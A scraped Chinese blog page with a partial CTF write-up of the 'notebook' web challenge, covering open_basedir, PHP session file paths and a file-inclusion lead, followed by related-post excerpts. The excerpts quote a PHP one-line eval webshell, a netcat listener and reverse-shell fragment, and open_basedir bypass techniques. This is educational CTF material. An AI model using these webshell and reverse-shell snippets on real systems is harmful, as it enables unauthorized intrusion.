“百度杯”CTF比赛 十二月场--notebook

最新推荐文章于 2023-03-10 12:30:02 发布
最新推荐文章于 2023-03-10 12:30:02 发布
阅读量787 收藏
点赞数
分类专栏: Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Oavinci/article/details/106279307
版权
本文详细记录了一次CTF比赛中的解题过程,涉及到PHP的open_basedir和session.save_path配置,以及文件包含漏洞的利用。通过目录扫描、访问限制的绕过,最终实现命令执行并获取到flag。
摘要由CSDN通过智能技术生成

知识点:

PHPinfo中

open_basedie设置用户访问文件的活动范围,其指定的限制实际上是前缀,而不是目录名。 举个例子: 若"open_basedir = /dir/user", 那么目录 "/dir/user" 和 "/dir/user1"都可访问。所以如果要将访问限制在仅为指定的目录,请用斜线结束路径名。例如设置成:"open_basedir = /dir/user/"

 

session.save_path是session文件存在的位置

session 的文件名格式为 sess_[PHPSESSID],而 sessionid 在发送的请求的 cookie 字段中PHPSESSID值也可以看到

 

看到登录界面url为action.php?module=php&file=login,想到题目提示中的文件包含

随便注册一个账号,admin/123,登陆成功显示there is not flag

目录扫描,发现robots.txt文件,访问得到 php1nFo.php文件

访问:http://246afaabe56d4b1cbe9063f03477c27e55325b5bc0b246a9.changame.ichunqiu.com/php1nFo.php

最低0.47元/天 解锁文章
FTOrange
关注
专栏目录
百度CTF比赛 2017 二月--web 爆破-3
hanjinrui15的博客
12-28 298
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码
百度CTF比赛 九月--web Upload
hanjinrui15的博客
12-30 664
百度CTF比赛 九月--web Upload基础知识1、什么是一句话木马?2、一句话木马的简要原理3、html渲染过程解析渲染该过程主要分为以下步骤:解决方案:4、PHP中substr()函数解题思路1、代码分析2、求解题目总结 基础知识 1、什么是一句话木马? 最简单的理解就是,一句话木马上传到网站后台,然后我们可以通过提交参数等的方式去获取shell,比如拿菜刀或者蚁剑等工具。比如下面这段php一句话木马: <?php @eval($_POST['key']) ?> 【基本原理
百度CTF比赛 十二月 notebook
为之的博客
06-30 836
tip指出,在phpinfo中有文件包含漏洞 打开网页,先尝试注册登录 这里注意,使用burp每次都进行查看 看到 跟文件有关系,那就得注意 打开御剑搜索一波 找到了robots.txt 找到phpinfo,进入 然鹅没有什么东西能注意,我尝试了cookie中加入一句话木马,后面phpinfo会显示,但是尖括号都被编码了。 从哪个file参数入手 我百度一波大佬的,了解到通过action跳转的phpinfo中,session存入用户可访问的tmp/SESS中 ..
CTF notebook
zero
08-11 869
Debug=0 Local=1 Frida=0 Debug_pwntools=1 #常量 Local_path='./notebook' Remote_addr='' Port=1 frida_script_path='./frida.js' ...
buuctf [Jupyter]notebook-rce
qq_1873822的博客
03-21 1087
Jupyter Notebook 未授权访问漏洞 Jupyter Notebook(此前被称为 IPython notebook)是一个交互式笔记本,支持运行 40 多加粗样式种编程语言。 如果管理员未为Jupyter Notebook配置密码,将导致未授权访问漏洞,游客可在其中创建一个console并执行任意Python代码和命令。 复现 在Terminal 创建控制台处可以执行任意命令 env打印环境变量 反弹shell 本机监听 nc -lvp 5555 # 目标执行 bash -i &g
课程作业及比赛任务,已支持 Notebook 内直接提交|ModelWhale 版本更新
最新发布
ModelWhale的博客
03-10 174
ModelWhale 将数据管理、建模分析、模型训练管理、算力资源管理等功能深度整合,通过逐级开放的数据基础设施、Jupyter Notebook 交互式、 Canvas 拖拽式、CloudIDE 三种分析界面、即开即用的云端分析环境,为科研工作者及团队解决数据安全、底层工程繁复、研究成果流转复现困难等问题,使数据驱动的研究更便捷高效。...
CTF Tricks』PHP-绕过open_basedir
Ho1aAs‘s Blog
09-10 2298
读取目录:DirectoryIterator类 + glob://协议;FilesystemIterator类 + glob://协议;读取文件:ini_set() + 相对路径;shell命令执行;symlink();
百度CTF比赛 十二月 - +——+
Darenfy 随记
01-08 313
题目内容:+++++ +++++ [->++ +++++ +++<] >++.+ +++++ .<+++ [->-- -<]>- -.+++ +++.< ++++[ ->+++ +<]>+ +++.< +++++ +++[- >---- ----< ]>— --.+. ----- -.<++ +++++ [->++ +++++ <]>++ ++.-- --.<+ +++++ [->-
百度CTF比赛 九月--YeserCMS
Oavinci的博客
03-22 590
正在上传…重新上传取消 在文档下载的评论区发现是EASYCMS 正在上传…重新上传取消 百度EASYCMS存在的漏洞,发现存在无限制报错注入,可获取全站信息 漏洞参考:https://www.w00yun.top/bugs/wooyun-2015-0137013.html 访问/celive/live/header.php进行报错注入 爆数据库,得到“Yeser...
百度CTF Write up集锦 WEB
热门推荐
4ct10n
09-21 4万+
九月1.code一开始的URL为http://ace3c302efed4a9094cbac1dff0250e8add1b4b45f8249d4.game.ichunqiu.com/index.php?jpg=hei.jpg尝试着令jpg=index.php得出了base64编码的文本 丢到解码器里解出文本index.php<?php /** * Created by PhpStorm. *
百度CTF比赛十二月)
Root__Liu的博客
04-13 4131
"百度"CTF比赛十二月) 第一 1、传说中的签到题 解决:把二进制用在线进制转换器转换,发现转为10进制时,和tips2一样,在qq上一查,是CTF官方群,在公告里有一个字符串ZmxhZ3tiMTU5MDI4Yy05NWZmLTRmNzEtYWQ3Yi1jZWY1MTBhMjJkMDB9 用base64解码,得到flag, flag{b159028c-95ff-4f
百度CTF比赛 九月 SQL-writeup
大方子
07-31 2954
  这题自己的收获:用&lt;&gt;隔开敏感字符,绕过防注入   题目界面: 刚开始还是老规矩输入and 1=1  发现被拦截  此外 测试了or 发现也进行了拦截 我们可以用下面的字符来替换 and 和 or and----&gt;&amp;&amp;    ,     or-----&gt; ||       替换后发现可以成功绕过 接下来进行猜字段长度  发...
百度CTF比赛 九月——Code
Ifish的博客
08-07 2685
题目描述 解题思路 1、打开题目链接,看到url,感觉应该是文件包含 查看源码,看到了图片的base64编码 2、感觉思路比较清晰,构造 index.php?jpg=index.php,查看源码,得到base64编码,解码,得到index.php的源码 &amp;lt;?php /** * Created by PhpStorm. * Date: 2015/11/16...
PHP文件包含漏洞攻防实战
weixin_30687811的博客
11-04 1592
摘要 PHP是一种非常流行的Web开发语言,互联网上的许多Web应用都是利用PHP开发的。而在利用PHP开发的Web应用中,PHP文件包含漏洞是一种常见的漏洞。利用PHP文件包含漏洞入侵网站也是主流的一种攻击手段。本文对PHP文件包含漏洞的形成、利用技巧及防范进行了详细的分析,并通过一个真实案例演示了如何利用PHP文件包含漏洞对目标网站进行渗透测试,最终成功获取到网站的WebShell。 1....
CTFSHOW web76 数据库读文件RCE
lonmar的博客
11-26 436
利用glob://绕过open_basedir限制读取目录 再利用MySQL函数读取文件 利用条件是知道数据库名称,密码等等 可能数据库信息泄露的时候可以用这个 try { $dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root','root'); foreach($dbh->query('select load_file("/flag36d.txt")') as $row) { echo
突破open_basedir进行列举目录
weixin_43999372的博客
11-07 461
open_basedir open_basedir 是php设置中为了防御php跨目录进行文件(目录)读写的方法,所有PHP中有关文件读、写的函数都会经过open_basedir的检查。Open_basedir实际上是一些目录的集合,在定义了open_basedir以后,php可以读写的文件、目录都将被限制在这些目录中。 利用DirectoryIterator + Glob 直接列举目录 Dire...
绕过open_basedir读文件脚本
一个码农的笔记
11-13 3439
参加了一2016年的sycsec感觉又学到不少东西 废话不多说,首先啥是open_basedir? open_basedir: 将用户可操作的文件限制在某目录下 具体的设置方法可以参考:http://blog.csdn.net/white__cat/article/details/32734343 这样设置之后,原则上被限制之外的目录是无法读写文件的,但是有一个漏洞却打破了这个限制 参
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值